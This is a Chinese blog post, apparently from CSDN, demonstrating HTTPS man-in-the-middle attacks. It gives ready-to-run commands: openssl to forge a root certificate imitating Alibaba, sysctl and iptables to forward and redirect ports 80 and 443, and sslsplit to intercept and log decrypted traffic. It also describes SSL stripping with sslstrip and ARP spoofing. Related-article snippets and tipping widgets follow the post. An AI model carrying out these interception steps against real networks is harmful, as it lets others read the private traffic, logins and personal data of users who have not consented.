【安全系列】https中间人攻击

最新推荐文章于 2024-03-09 21:03:08 发布
最新推荐文章于 2024-03-09 21:03:08 发布
阅读量2.9k 收藏 9
点赞数 1
分类专栏: 安全系列 文章标签: https sslsplit sslstrip
大家感觉很有用,请帮忙转发,您的每一次转发就是对我的支持
本文链接:https://blog.csdn.net/qq_30285985/article/details/108186522
版权

文章目录

前言

刚了解了https是如何加密传输,但是https却又不是那么得完美,中间人还是通过各种手段来获取目标信息。废话不多说,开始演示。

一、证书伪造攻击

1.实现思路

在这里插入图片描述
中间人在服务器和浏览器中间。面向服务器时,他伪装成一个浏览器客户端,面向浏览器时,他伪装成一个服务器。主要实现步骤如下:

  1. 中间人想办法对浏览器到服务器的数据进行拦截,通过arp欺骗或者dns欺骗等等,方式有很多,需要按照自己的场景进行处理。
  2. 服务器收到https请求时,会下发证书,这个证书是可以得CA认证的,中间人同样可以从证书中获取服务器的公钥。
  3. 中间人创建一个根证书,通过这个根证书对服务器下发的证书继续伪造,伪造成功后下发给客户端。
  4. 浏览器收到一个假的证书,不会通过证书检测,会报一个网上不是安全的,是否继续等等的异常信息,异常信息如下。这个时候如果用户就是想要访问的话,之后所有和该服务器交互的信息都会被中间人获取。
    在这里插入图片描述
    基本每个https的网站都会有这种异常信息,证书伪造会使得用户有感知,如果是知道这种攻击方式的人,就会对攻击的效果有影响。这种异常信息也是可以去除的,就是使得用户浏览器安装中间人创建的根证书,使得中间人颁发的证书得到信任即可,在开发的过程中,经常使用fiddler来抓取https的包,原理就是使用了证书伪造。

2.实施攻击

2.1.生成私钥
openssl genrsa -out ca.key 2048
2048表示私钥的长度
2.2.通过私钥生成证书

kali@kali:~$ openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
#国家名称
Country Name (2 letter code) [AU]:CN   
#省份
State or Province Name (full name) [Some-State]:zhejiang
#城市
Locality Name (eg, city) []:Hangzhou
#公司名称
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Alibaba
Organizational Unit Name (eg, section) []:ali
Common Name (e.g. server FQDN or YOUR name) []:alibaba

在根证书生成的时候,需要填写一些信息达到仿真的效果,这个按照自己的想法,尽可能高仿就可以了,没什么大的用处,就是用来看着像真的证书颁发者就可以了。
2.3开启路由转发
sysctl -w net.ipv4.ip_forward=1
用户到达kali的流量需要转发出去,所以开起路由转发。
2.4端口转发
80端口转发到8080
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
443 端口转发到8443
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8443
2.5实施监听
sudo sslsplit -D -l connect.log -j https/ -S https/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
在执行之前需要在当前目录下创建https目录和https/logdir目录

  1. -D debug模式,显示较多的日志信息
  2. -l 连接请求的信息记录到connec.log中
  3. -j root根目录(简单理解就好)
  4. -S 日志目录
  5. -k 指定私钥
  6. -c 指定证书

二、协议转换攻击

1.实现思路

在这里插入图片描述

在平时访问百度的时候,即使使用http访问百度的时候,百度也会重定向到https,通过这一个思路,翻转一下,用户如果使用https访问服务器的时候,返回重定向信息,使得浏览器使用http协议到中间人,中间人收到浏览器请求的时候,代理浏览器和服务器进行交互。
这种思路没有了证书的验证,也没有了浏览器异常的抛出,相对于用户是无感知的,更容易达到攻击的效果。

2.实施攻击

通过sslstrip进行攻击,下载地址:https://github.com/moxie0/sslstrip

下载之后通过github中教程进行安装,通过python sslstrip.py -l 8080 启动。
之后可以通过arp欺骗等等,进行信息拦截。

每天学一点,进去早一点,大家切勿做坏事。

系列文章目录

【安全系列】wireshark解析https

叁滴水
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
清晰图解https如何防范中间人攻击
oZhuZhiYuan的博客
06-09 1万+
https/tls原理 HTTPS访问的三个阶段 第一阶段 认证站点 客户端向站点发起HTTPS请求,站点返回数字证书。客户端通过数字证书验证所访问的站点是真实的目标站点。 第二阶段 协商密钥 客户端与站点服务器协商此次会话的对称加密密钥,用于下一阶段的加密传输。 第三阶段 加密传输 客户端与站点直接使用已协商的对称加密密钥传输数据。 以下用一张图描绘CA、站点服务器、客户端之间的交互关系 中间人攻击 中间人攻击的几种形式 直接抓取报文获得明文信息 非法中间加密代理,窃取明文信息
HTTPS攻击(SSL/TLS中间人攻击
初学者L_言的博客
03-01 2806
一、场景环境 攻击机: kali 目标机: WinServer 2003 二、原理 攻击前提: 客户端已经信任伪造证书颁发机构; 攻击者控制了核发证书颁发机构; 客户端程序禁止了显示证书错误告警信息; 攻击者已经控制客户端,并强制其信任伪造证书。 角色: 客户端、客户路由器、真实服务器、攻击者代理服务器 (攻击者代理服务器)攻击者 通过ARP欺骗客户端通过攻击者做网关,数据包通过攻击者发出。此...
Https中间人攻击
yshir
11-04 4477
Https中间人攻击 https协议由 http + ssl 协议构成,具体的链接过程可参考SSL或TLS握手的概述 中间人攻击过程如下: 服务器向客户端发送公钥。 攻击者截获公钥,保留在自己手上。 然后攻击者自己生成一个【伪造的】公钥,发给客户端。 客户端收到伪造的公钥后,生成加密hash值发给服务器。 攻击者获得加密hash值,用自己的私钥解密获得真秘钥。 同时生成假的加密hash值,发给服务器。 服务器用私钥解密获得假秘钥。 服务器用加秘钥加密传输信息 防范方法: 服务端在发.
通过伪造CA证书,实现SSL中间人攻击
热门推荐
明明
04-10 2万+
最近在网络上查找SSL中间人攻击相关的文章,发现大多都是同一篇文章的转载,原创的很少,而这篇文章中又缺少很多细节。所以我在ubuntu10.04下使用openssl进行了一次SSL中间人攻击实验,并将实验过程记录下来,希望能对别人有所帮助。本人初次接触SSL中间人攻击,文章中可能有错误的地方,希望大家多多批评指正。 如若转载请注明出处,谢谢。 通过伪造CA证书,实现
HTTPS中间人攻击HTTPS被抓包了怎么办?
ThinPikachu的博客
03-12 1万+
目录 一、写在前面 二、什么是中间人攻击 三、https 是绝对安全的吗 四、中间人攻击的初步了解 五、中间人攻击的深入了解 六、https 是如何防止中间人攻击的 SSL-Pinning 七、浏览器是如何确保CA证书的合法性? (1)证书包含什么信息? (2)证书的合法性依据是什么? (3)浏览器如何验证证书的合法性? 八、https 可以抓包吗 九、预置证书/公钥更新问题 一、写在前面 首先,当个位读者在看到这篇文章时,我默认大家已经对...
了解 HTTPS 中间人攻击:保护你的网络安全
最新发布
你若盛开,清风自来
03-09 1644
HTTPS 中间人攻击是一种常见的网络安全威胁,它可以通过截取、篡改和重新发送 HTTPS 通信数据来窃取敏感信息。本文将介绍 HTTPS 中间人攻击的原理、危害以及如何防范此类攻击HTTPS 中间人攻击是一种危险的网络安全威胁,了解其原理和危害,采取有效的防范措施,对我们保护个人信息和网络安全至关重要。
HTTPS (HTTP+SSL) 对称/非对称加密 中间人攻击 证书加密
qq_60021974的博客
04-25 1071
HTTPS也是应用层协议, 在HTTP基础带上加了一个安全HTTPS -> HTTP + SSL(加密协议) HTTP 协议内容都是按照文本的方式明文传输的. 这就导致在传输过程中出现一些被篡改的情况(运营商劫持, 流量劫持)
HTTPSHTTPS中间人攻击
weixin_34041003的博客
08-01 274
HTTPSHTTPS中间人攻击,全站HTTPS正在称为潮流趋势,国内实现全站https的有淘宝和百度两家。 一、https的作用 C I A:机密性,完整性,可用性(可用性是合法用户可以访问自己有权限访问的资源) 解决的是信息传输中数据被篡改、窃取 加密:对称、非对称、单向 二、https工作原理 https的工作原理还是有必要研究下的(原理我也是从...
web安全措施.你写的WEB API接口如何预防黑客攻击_webservice接口实例
12-25
通过加密通信,HTTPS可以保护数据在传输过程中的安全性,防止中间人攻击和数据被窃听。同时,确保服务器证书的有效性,防止被假冒的服务器欺骗。 **API限速和速率限制** 可以防止DDoS(分布式拒绝服务)攻击以及...
HTTPS权威指南-高清版
08-20
当客户端访问服务器时,会验证证书的有效性,确保与之通信的是真实的服务器,而非中间人攻击者。 除了基础概念,书中还会详细讲解HTTPS的实施过程,包括服务器端的配置、客户端的处理、以及如何处理各种安全问题。...
HTTPS协议中间人攻击的防御方法_邓真.pdf
06-06
https原理及中间人劫持防御方法论文,知网上下载的论文,在这里分享出来。
Https安全请求验证集成Gradle
07-27
当客户端(如浏览器)与服务器建立连接时,它们会通过一系列握手过程协商加密算法和交换密钥,然后所有通信都将被加密,防止中间人攻击和数据被窃取。 在项目中使用Gradle构建HTTPS验证工具有以下几个关键步骤: 1...
工业控制网络安全系列之二 SCADA不再“狼来了”,到底谁在攻击你的工业控制系统.pdf
09-20
《工业控制网络安全系列之二:SCADA不再“狼来了”,到底谁在攻击你的工业控制系统》 监控及数据采集系统(SCADA)是工业控制系统(ICS)的重要组成部分,它通过通信系统/网络为ICS操作员提供过程管理和监控所需的...
HTTPS协议配置——提高网站安全性.doc
01-07
此外,中间人攻击也可能导致用户与假冒服务器进行通信,从而被诱骗泄露个人信息。 为了解决这些问题,HTTPS应运而生。HTTPS通过SSL/TLS协议在HTTP的基础上增加了加密层和身份验证机制。当用户访问HTTPS网站时,...
java HTTPS请求绕过证书检测
u014644574的博客
08-19 3077
java HTTPS请求绕过证书检测 PKIX:unable to find valid certification path to requested target package util; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStreamWriter; import java.net.URL; impo
HTTPS 原理分析:带着疑问层层深入
程序员小乐
12-20 1039
点击上方 "程序员小乐"关注,星标或置顶一起成长每天凌晨00点00分,第一时间与你相约每日英文Don't worry too much about the a...
基于ARP欺骗实现中间人攻击,破解HTTPS数据为明文
a690197843的博客
02-28 5110
基于ARP欺骗实现中间人攻击,破解HTTPS数据为明文
详解HTTPS连接过程以及中间人攻击劫持
Linuxprobe18的博客
03-19 5632
一 、HTTPS连接过程及中间人攻击原理https协议就是http+ssl协议,如下图所示为其连接过程:1.https请求客户端向服务端发送https请求;2.生成公钥和私钥服务端收到请求之后,生成公钥和私钥。公钥相当于是锁,私钥相当于是钥匙,只有私钥才能够打开公钥锁住的内容;3.返回公钥服务端将公钥(证书)返回给客户端,公钥里面包含有很多信息,比如证书的颁发机构、过期时间等等;4.客户端验证公钥...
HTTPS 证书被伪造了怎么办?
小生方勤
09-22 1248
HTTPS 协议的安全依赖于它的证书机制,如果攻击者申请到了一张和你的网站一摸一样的证书,那你网站的安全机制也就不复存在了。本文来聊一聊,如何预防 HTTPS 证书伪造。证书劫持 如果想...
解释一下中间人攻击模型
12-17
中间人攻击是指攻击者在通信的两端之间进行窃听、篡改或伪造信息的攻击行为。攻击者可以截获通信双方的信息,然后篡改信息并将其发送给接收方,使得接收方认为这是合法的信息。攻击者还可以在不被发现的情况下窃取双方的敏感信息,例如用户名、密码等。中间人攻击是一种隐蔽性很强的攻击方式,因为攻击者可以在不被发现的情况下窃取信息,而通信双方并不知道信息已经被截获或篡改了。 802.1X-2004认证者和申请者状态机模型是一种用于描述认证过程的模型,它可以用来分析RSN中的中间人攻击。在RSN关联建立过程中,认证者和申请者需要进行身份验证和密钥协商,以确保通信的安全性。攻击者可以通过伪造认证者或申请者的身份来进行中间人攻击,从而窃取双方的敏感信息或篡改通信内容。为了防止中间人攻击,RSN采用了一系列安全机制,例如使用预共享密钥、数字证书等来进行身份验证和密钥协商,以确保通信的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

叁滴水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值